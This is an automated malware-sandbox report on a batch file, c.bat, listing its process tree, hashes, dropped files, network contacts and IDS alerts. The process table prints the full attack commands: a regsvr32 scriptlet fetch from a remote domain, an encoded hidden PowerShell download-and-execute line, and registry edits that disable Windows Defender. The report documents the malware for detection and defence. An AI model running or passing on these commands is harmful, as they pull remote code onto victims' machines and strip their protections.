File name: | c.bat |
Full analysis: | https://app.any.run/tasks/2a9e1eb6-205d-47a2-a5a5-be4f04b77564 |
Verdict: | Malicious activity |
Threats: | Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email. |
Analysis date: | January 11, 2019, 03:56:41 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with no line terminators |
MD5: | 72A8B684CDA2A5E4BA568224F27CF0F5 |
SHA1: | 3C41387E1B21F7E8083DCD9A26D10E095AA2D3E7 |
SHA256: | 71840EF23304366D11B1EB2D71E8BCA416CF6F200A932F119C87B993F2FD495D |
SSDEEP: | 3:pLACpGElFaeHiLQRAQGKIfmjxQ/A+L/J:pLXGdGiUlIf9/A+DJ |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3512 | cmd /c ""C:\Users\admin\AppData\Local\Temp\c.bat" " | C:\Windows\system32\cmd.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2292 | cmd.exe /c regsvr32 /u /s /i:http://update.7h4uk.com:443/antivirus.php scrobj.dll | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2492 | regsvr32 /u /s /i:http://update.7h4uk.com:443/antivirus.php scrobj.dll | C:\Windows\system32\regsvr32.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft(C) Register Server Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3868 | "C:\Windows\System32\cmd.exe" /c powershell.exe -nop -noni -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADgANQAuADIAMwA0AC4AMgAxADcALgAxADMAOQAvAHYAZQByAGMAaABlAGMAawAuAHAAcwAxACcAKQApAAoA | C:\Windows\System32\cmd.exe | — | regsvr32.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2288 | powershell.exe -nop -noni -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADgANQAuADIAMwA0AC4AMgAxADcALgAxADMAOQAvAHYAZQByAGMAaABlAGMAawAuAHAAcwAxACcAKQApAAoA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3300 | "C:\Windows\system32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f | C:\Windows\system32\reg.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Registry Console Tool Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3884 | "C:\Windows\system32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f | C:\Windows\system32\reg.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Registry Console Tool Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2252 | "C:\Windows\system32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f | C:\Windows\system32\reg.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Registry Console Tool Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1840 | "C:\Windows\system32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f | C:\Windows\system32\reg.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Registry Console Tool Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2288 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\43L4T187CQFCZK4DRI5W.temp | — | |
MD5:— | SHA256:— | |||
2288 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
2492 | regsvr32.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\antivirus[1].php | xml | |
MD5:47E17908E33BF9755F5B77D84E685679 | SHA256:7A547CC11D2DD7E0EDC1382555A65FC320909795FFEED0F32D10DC70D42CAB38 | |||
2288 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF19ec3b.TMP | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2288 | powershell.exe | GET | — | 111.90.145.52:443 | http://update.7h4uk.com:443/antitrojan.ps1 | MY | — | — | malicious |
2492 | regsvr32.exe | GET | 200 | 111.90.145.52:443 | http://update.7h4uk.com:443/antivirus.php | MY | xml | 651 b | malicious |
2288 | powershell.exe | GET | 200 | 185.234.217.139:80 | http://185.234.217.139/vercheck.ps1 | unknown | text | 10.5 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2492 | regsvr32.exe | 111.90.145.52:443 | update.7h4uk.com | Shinjiru Technology Sdn Bhd | MY | malicious |
2288 | powershell.exe | 185.234.217.139:80 | — | — | — | malicious |
2288 | powershell.exe | 111.90.145.52:443 | update.7h4uk.com | Shinjiru Technology Sdn Bhd | MY | malicious |
Domain | IP | Reputation |
---|---|---|
update.7h4uk.com |
| unknown |
PID | Process | Class | Message |
---|---|---|---|
2492 | regsvr32.exe | A Network Trojan was detected | ET CURRENT_EVENTS Likely Malicious Windows SCT Download MSXMLHTTP AX |
2492 | regsvr32.exe | A Network Trojan was detected | MALWARE [PTsecurity] Squiblydoo Scriptlet |
2492 | regsvr32.exe | Misc activity | SUSPICIOUS [PTsecurity] Encoded PowerShell script (New-Object) |
2288 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Powershell downloading stage during Zyklon delivery |
2288 | powershell.exe | A Network Trojan was detected | MINER [PTsecurity] ThreatMiner Powershell obfuscation script possible |
2288 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious behavior - PowerShell script downloading from non-standard port |